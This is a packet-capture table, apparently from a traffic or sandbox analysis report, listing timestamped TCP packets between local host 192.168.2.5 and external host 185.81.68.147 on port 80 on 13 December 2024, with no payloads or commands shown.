                                                                                                                                                                Dec 13, 2024 01:37:31.549364090 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.610102892 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.611481905 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.642740011 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.642910957 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.642942905 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.643086910 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.644259930 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.644318104 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.644437075 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.644490957 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.647355080 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.647408009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.647409916 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.647454977 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.650348902 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.650403976 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.650473118 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.650520086 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.653310061 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.653362036 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.653425932 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.653471947 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.656295061 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.656341076 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.656347036 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.656404018 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.659197092 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.659246922 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.659308910 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.659359932 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.662022114 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.662072897 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.662136078 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.662180901 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.664763927 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.664865971 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.664871931 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.664921045 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.667486906 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.667536974 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.667537928 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.667583942 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.670188904 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.670237064 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.670279026 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.670325041 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.672827005 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.672877073 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.672945976 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.672991037 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.675436974 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.675532103 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.675565004 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.675611973 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.677956104 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.678078890 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.678128958 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.680556059 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.680609941 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.680610895 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.680654049 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.683085918 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.683134079 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.683136940 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.683176994 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.686539888 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.686575890 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.686593056 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.686616898 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.688620090 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.688652992 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.688669920 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.688698053 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.691392899 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.691427946 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.691445112 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.691474915 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.695398092 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.695431948 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.695497990 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.696880102 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.696913958 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.696968079 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.699419975 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.699454069 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.699471951 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.699498892 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.702598095 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.702630997 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.702682972 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.703939915 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.703974009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.704021931 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.706177950 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.706286907 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.706343889 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.708888054 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.708921909 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.708980083 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.711388111 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.711421967 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.711452007 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.711483002 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.713787079 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.713967085 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.714031935 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.716814995 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.716849089 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.716908932 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.718928099 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.719027042 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.719057083 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.719099045 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.721610069 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.721645117 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.721698999 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.724078894 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.724112988 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.724164963 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.726942062 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.726975918 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.726996899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.727021933 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.729590893 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.729624033 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.729746103 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.731225967 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.731664896 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.731718063 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.731798887 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.731846094 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.734863043 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.734896898 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.734918118 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.734941006 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.736753941 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.736809015 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.736872911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.736920118 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.739352942 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.739434958 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.739499092 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.741906881 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.742044926 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.742099047 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.744478941 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.744537115 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.744597912 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.744786024 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.747015953 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.747071028 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.747101068 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.747148991 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.749594927 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.749742031 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.749804020 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.752420902 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.752454996 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.752510071 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.754791975 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.754848003 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.754889011 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.755103111 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.757252932 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.757313967 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.757375956 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.757425070 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.759893894 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.759987116 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.760006905 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.760034084 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.762386084 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.762439966 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.762481928 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.762530088 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.765065908 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.765100002 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.765126944 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.765136957 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.767478943 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.767529011 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.767529964 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.767574072 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.770005941 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.770059109 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.770078897 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.770128012 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.772588968 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.772655964 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.772663116 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.772705078 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.775105953 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.775160074 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.775228024 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.775276899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.777749062 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.777801037 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.777829885 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.777879000 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.780247927 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.780356884 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.780405045 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.780457020 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.835441113 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.835498095 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.835601091 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.836533070 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.836566925 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.836730957 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.837992907 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.839087963 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.839122057 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.839148045 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.839160919 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.840781927 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.840909004 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.840961933 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.843394041 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.843426943 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.843477011 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.845040083 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.845473051 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.845526934 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.846934080 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.846966982 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.847022057 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.848814011 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.849070072 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.849138975 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.850744963 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.850797892 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.850811005 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.850851059 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.852686882 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.852739096 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.852744102 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.852794886 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.854610920 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.854645014 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.854670048 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.854691982 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.856415033 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.856514931 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.858249903 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.858433962 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.860191107 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.860224009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.860477924 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.861808062 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.862188101 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.862250090 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.863656044 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.863689899 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.863712072 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.863742113 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.865731955 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.865766048 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.865820885 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.867136955 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.867259026 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.867322922 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.868794918 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.868844986 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.868889093 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.870547056 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.870599985 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.870898962 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.872437954 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.872471094 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.872492075 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.872508049 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.873996973 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.874047995 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.874099016 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.875600100 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.875652075 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.875677109 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.875771046 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.877274990 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.877326965 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.877408981 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.877456903 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.878935099 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.878987074 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.878995895 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.879034042 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.880511045 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.880564928 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.880688906 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.880748987 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.882467031 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.882502079 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.882519960 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.882550955 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.883773088 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.883822918 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.883852959 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.883990049 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.885389090 CET8049753185.81.68.147192.168.2.5
